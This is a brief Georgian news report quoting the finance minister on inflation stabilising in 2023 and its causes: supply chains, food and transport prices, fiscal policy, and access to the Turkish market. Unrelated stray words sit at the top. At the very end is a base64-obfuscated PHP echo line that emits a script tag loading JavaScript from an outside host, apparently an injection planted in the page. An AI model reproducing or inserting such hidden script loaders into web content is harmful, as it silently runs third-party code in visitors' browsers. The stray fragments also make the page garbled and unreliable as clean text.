celsiusi
ავერსი შნაიდერი

ფინანსთა მინისტრ ლაშა ხუციშვილის განცხადებით, წლის მეორე ნახევრიდან ფიქსირდება  ინფლაციის მკვეთრი დასტაბილურება, რასაც მისი თქმით, ხელი შეუწყო როგორც მაკროეკონომიკურმა პოლიტიკამ და ფისკალურმა კონსოლიდაციამ, ასევე საერთაშორისო ფასების დასტაბილურებამ, მედიკამენტებზე რეფერენტული ფასების მექანიზმის შემოღებამ და თურქეთის ბაზარზე წვდომამ.

„პანდემიიდან მოყოლებული, მსოფლიოში მიმდინარე მოვლენების გამო, მნიშვნელოვნად დაირღვა მიწოდების ჯაჭვები, რამაც მსოფლიო ბაზრებზე სურსათის და ენერგომატარებლების მნიშვნელოვანი ზრდა განაპირობა, რაც პოსტპანდემიურ პერიოდში მთელ მსოფლიოში სამომხმარებლო ფასების მნიშვნელოვანი ზრდის მიზეზი გახდა. აქედან გამომდინარე, საქართველოში 2021-2022 წლებში არსებული ინფლაცია. ძირითადად. განპირობებული იყო სურსათის და უალკოჰოლო სასმელებისა და ტრანსპორტის კომპონენტებით, რომლებმაც მსოფლიო ბაზარზე ფასების კლების გამო, 2023 წელს ინფლაციის ტემპის შემცირებაში უკვე დადებითი გავლენა მოახდინეს“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

397
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");